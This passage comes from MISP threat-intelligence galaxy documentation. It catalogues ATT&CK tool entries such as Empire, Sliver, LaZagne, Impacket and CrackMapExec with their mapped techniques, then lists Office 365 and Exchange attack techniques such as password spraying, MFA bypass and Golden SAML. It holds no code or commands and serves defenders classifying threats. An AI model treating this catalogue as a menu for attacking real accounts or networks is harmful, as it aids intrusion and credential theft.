uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1471" with estimative-language:likelihood-probability="almost-certain"

Table 5210. Table References
Links
https://attack.mitre.org/software/S0298
http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/

Empire - S0363

[Empire](https://attack.mitre.org/software/S0363) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://attack.mitre.org/techniques/T1059/001) for Windows and Python for Linux/macOS. [Empire](https://attack.mitre.org/software/S0363) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.(Citation: NCSC Joint Report Public Tools)(Citation: Github PowerShell Empire)(Citation: GitHub ATTACK Empire)

The tag is: misp-galaxy:mitre-tool="Empire - S0363"

Empire - S0363 is also known as:

Empire
EmPyre
PowerShell Empire

View relationships graph

Empire - S0363 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Golden Ticket - T1558.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Support Provider - T1547.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1134.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Group Policy Modification - T1484.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Code Repository - T1567.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Silver Ticket - T1558.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Path Interception by PATH Environment Variable - T1574.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Path Interception by Search Order Hijacking - T1574.008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Path Interception by Unquoted Path - T1574.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="MSBuild - T1127.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1574.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Group Policy Discovery - T1615" with estimative-language:likelihood-probability="almost-certain"

Table 5211. Table References
Links
https://attack.mitre.org/software/S0363
https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools
https://github.com/EmpireProject/Empire
https://github.com/dstepanic/attck_empire

Sliver - S0633

[Sliver](https://attack.mitre.org/software/S0633) is an open source, cross-platform, red team command and control framework written in Golang.(Citation: Bishop Fox Sliver Framework August 2019)

The tag is: misp-galaxy:mitre-tool="Sliver - S0633"

Sliver - S0633 is also known as:

Sliver

View relationships graph

Sliver - S0633 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1001.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 5212. Table References
Links
https://attack.mitre.org/software/S0633
https://labs.bishopfox.com/tech-blog/sliver

RawDisk - S0364

[RawDisk](https://attack.mitre.org/software/S0364) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer’s hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.(Citation: EldoS RawDisk ITpro)(Citation: Novetta Blockbuster Destructive Malware)

The tag is: misp-galaxy:mitre-tool="RawDisk - S0364"

RawDisk - S0364 is also known as:

RawDisk

View relationships graph

RawDisk - S0364 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1561.001" with estimative-language:likelihood-probability="almost-certain"

Table 5213. Table References
Links
https://attack.mitre.org/software/S0364
https://www.itprotoday.com/windows-78/eldos-provides-raw-disk-access-vista-and-xp
https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf

LaZagne - S0349

[LaZagne](https://attack.mitre.org/software/S0349) is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. [LaZagne](https://attack.mitre.org/software/S0349) is publicly available on GitHub.(Citation: GitHub LaZagne Dec 2018)

The tag is: misp-galaxy:mitre-tool="LaZagne - S0349"

LaZagne - S0349 is also known as:

LaZagne

View relationships graph

LaZagne - S0349 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keychain - T1555.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proc Filesystem - T1003.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="/etc/passwd and /etc/shadow - T1003.008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

Table 5214. Table References
Links
https://attack.mitre.org/software/S0349
https://github.com/AlessandroZ/LaZagne

Impacket - S0357

[Impacket](https://attack.mitre.org/software/S0357) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://attack.mitre.org/software/S0357) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.(Citation: Impacket Tools)

The tag is: misp-galaxy:mitre-tool="Impacket - S0357"

Impacket - S0357 is also known as:

Impacket

View relationships graph

Impacket - S0357 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

Table 5215. Table References
Links
https://attack.mitre.org/software/S0357
https://www.secureauth.com/labs/open-source-tools/impacket

Ruler - S0358

[Ruler](https://attack.mitre.org/software/S0358) is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of [Ruler](https://attack.mitre.org/software/S0358) have also released a defensive tool, NotRuler, to detect its usage.(Citation: SensePost Ruler GitHub)(Citation: SensePost NotRuler)

The tag is: misp-galaxy:mitre-tool="Ruler - S0358"

Ruler - S0358 is also known as:

Ruler

View relationships graph

Ruler - S0358 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Outlook Home Page - T1137.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Outlook Rules - T1137.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Outlook Forms - T1137.003" with estimative-language:likelihood-probability="almost-certain"

Table 5216. Table References
Links
https://attack.mitre.org/software/S0358
https://github.com/sensepost/ruler
https://github.com/sensepost/notruler

Nltest - S0359

[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)

The tag is: misp-galaxy:mitre-tool="Nltest - S0359"

Nltest - S0359 is also known as:

Nltest

View relationships graph

Nltest - S0359 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 5217. Table References
Links
https://attack.mitre.org/software/S0359
https://ss64.com/nt/nltest.html

ShimRatReporter - S0445

[ShimRatReporter](https://attack.mitre.org/software/S0445) is a tool used by suspected Chinese adversary [Mofang](https://attack.mitre.org/groups/G0103) to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as [ShimRat](https://attack.mitre.org/software/S0444)) as well as set up faux infrastructure which mimics the adversary’s targets. [ShimRatReporter](https://attack.mitre.org/software/S0445) has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.(Citation: FOX-IT May 2016 Mofang)

The tag is: misp-galaxy:mitre-tool="ShimRatReporter - S0445"

ShimRatReporter - S0445 is also known as:

ShimRatReporter

View relationships graph

ShimRatReporter - S0445 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

Table 5218. Table References
Links
https://attack.mitre.org/software/S0445
https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf

CARROTBALL - S0465

[CARROTBALL](https://attack.mitre.org/software/S0465) is an FTP downloader utility that has been in use since at least 2019. [CARROTBALL](https://attack.mitre.org/software/S0465) has been used as a downloader to install [SYSCON](https://attack.mitre.org/software/S0464).(Citation: Unit 42 CARROTBAT January 2020)

The tag is: misp-galaxy:mitre-tool="CARROTBALL - S0465"

CARROTBALL - S0465 is also known as:

CARROTBALL

View relationships graph

CARROTBALL - S0465 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 5219. Table References
Links
https://attack.mitre.org/software/S0465
https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/

Wevtutil - S0645

[Wevtutil](https://attack.mitre.org/software/S0645) is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.(Citation: Wevtutil Microsoft Documentation)

The tag is: misp-galaxy:mitre-tool="Wevtutil - S0645"

Wevtutil - S0645 is also known as:

Wevtutil

View relationships graph

Wevtutil - S0645 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

Table 5220. Table References
Links
https://attack.mitre.org/software/S0645
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil

CrackMapExec - S0488

[CrackMapExec](https://attack.mitre.org/software/S0488), or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. [CrackMapExec](https://attack.mitre.org/software/S0488) collects Active Directory information to conduct lateral movement through targeted networks.(Citation: CME Github September 2018)

The tag is: misp-galaxy:mitre-tool="CrackMapExec - S0488"

CrackMapExec - S0488 is also known as:

CrackMapExec

View relationships graph

CrackMapExec - S0488 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 5221. Table References
Links
https://attack.mitre.org/software/S0488
https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference

o365-exchange-techniques

o365-exchange-techniques - Office365/Exchange related techniques by @johnLaTwC and @inversecos.

o365-exchange-techniques is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: John Lambert - Alexandre Dulaunoy - Lina Lau - Thomas Patzke

AAD - Dump users and groups with Azure AD

The tag is: misp-galaxy:cloud-security="AAD - Dump users and groups with Azure AD"

AAD - PowerShell

The tag is: misp-galaxy:cloud-security="AAD - PowerShell"

AAD - Enumerate Domains

The tag is: misp-galaxy:cloud-security="AAD - Enumerate Domains"

AAD - Enumerate Users

The tag is: misp-galaxy:cloud-security="AAD - Enumerate Users"

O365 - Get Global Address List: MailSniper

The tag is: misp-galaxy:cloud-security="O365 - Get Global Address List: MailSniper"

O365 - Find Open Mailboxes: MailSniper

The tag is: misp-galaxy:cloud-security="O365 - Find Open Mailboxes: MailSniper"

O365 - User account enumeration with ActiveSync

The tag is: misp-galaxy:cloud-security="O365 - User account enumeration with ActiveSync"

End Point - Search host for Azure Credentials: SharpCloud

The tag is: misp-galaxy:cloud-security="End Point - Search host for Azure Credentials: SharpCloud"

On-Prem Exchange - Portal Recon

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Portal Recon"

On-Prem Exchange - Enumerate domain accounts: using Skype4B

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Enumerate domain accounts: using Skype4B"

On-Prem Exchange - Enumerate domain accounts: OWA & Exchange

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Enumerate domain accounts: OWA & Exchange"

On-Prem Exchange - Enumerate domain accounts: FindPeople

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Enumerate domain accounts: FindPeople"

On-Prem Exchange - OWA version discovery

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - OWA version discovery"

Bruteforce via OWA

The tag is: misp-galaxy:cloud-security="Bruteforce via OWA"

Bruteforce EWS

The tag is: misp-galaxy:cloud-security="Bruteforce EWS"

Bruteforce OAuth

The tag is: misp-galaxy:cloud-security="Bruteforce OAuth"

Bruteforce via AAD Sign in Form

The tag is: misp-galaxy:cloud-security="Bruteforce via AAD Sign in Form"

Bruteforce through Autologon API

The tag is: misp-galaxy:cloud-security="Bruteforce through Autologon API"

AAD - Password Spray: MailSniper

The tag is: misp-galaxy:cloud-security="AAD - Password Spray: MailSniper"

AAD - Password Spray: CredKing

The tag is: misp-galaxy:cloud-security="AAD - Password Spray: CredKing"

O365 - Bruteforce of Autodiscover: SensePost Ruler

The tag is: misp-galaxy:cloud-security="O365 - Bruteforce of Autodiscover: SensePost Ruler"

O365 - Phishing for credentials

The tag is: misp-galaxy:cloud-security="O365 - Phishing for credentials"

O365 - Phishing using OAuth app

The tag is: misp-galaxy:cloud-security="O365 - Phishing using OAuth app"

O365 - 2FA MITM Phishing: evilginx2

The tag is: misp-galaxy:cloud-security="O365 - 2FA MITM Phishing: evilginx2"

O365 - MFA Bypass via IMAP/POP

The tag is: misp-galaxy:cloud-security="O365 - MFA Bypass via IMAP/POP"

Compromising Pass-Through Authentication

The tag is: misp-galaxy:cloud-security="Compromising Pass-Through Authentication"

Enumerate Users, Admins, Roles and Permissions

The tag is: misp-galaxy:cloud-security="Enumerate Users, Admins, Roles and Permissions"

Enumerate MFA Settings

The tag is: misp-galaxy:cloud-security="Enumerate MFA Settings"

Golden SAML

The tag is: misp-galaxy:cloud-security="Golden SAML"

On-Prem Exchange - Password Spray using Invoke-PasswordSprayOWA, EWS

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Password Spray using Invoke-PasswordSprayOWA, EWS"

On-Prem Exchange - Bruteforce of Autodiscover: SensePost Ruler

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Bruteforce of Autodiscover: SensePost Ruler"

Change MFA Settings

The tag is: misp-galaxy:cloud-security="Change MFA Settings"

Change Conditional Access Settings

The tag is: misp-galaxy:cloud-security="Change Conditional Access Settings"

Malicious App Registrations

The tag is: misp-galaxy:cloud-security="Malicious App Registrations"

Add Service Principal or App Credentials

The tag is: misp-galaxy:cloud-security="Add Service Principal or App Credentials"

Add Service Principal

The tag is: misp-galaxy:cloud-security="Add Service Principal"

Add Federation Trust

The tag is: misp-galaxy:cloud-security="Add Federation Trust"

O365 - Add Mail forwarding rule

The tag is: misp-galaxy:cloud-security="O365 - Add Mail forwarding rule"

Add Global admin account

The tag is: misp-galaxy:cloud-security="Add Global admin account"

Add user account

The tag is: misp-galaxy:cloud-security="Add user account"

O365 - Delegate Tenant Admin

The tag is: misp-galaxy:cloud-security="O365 - Delegate Tenant Admin"

End Point - Persistence throught Outlook Home Page: SensePost Ruler
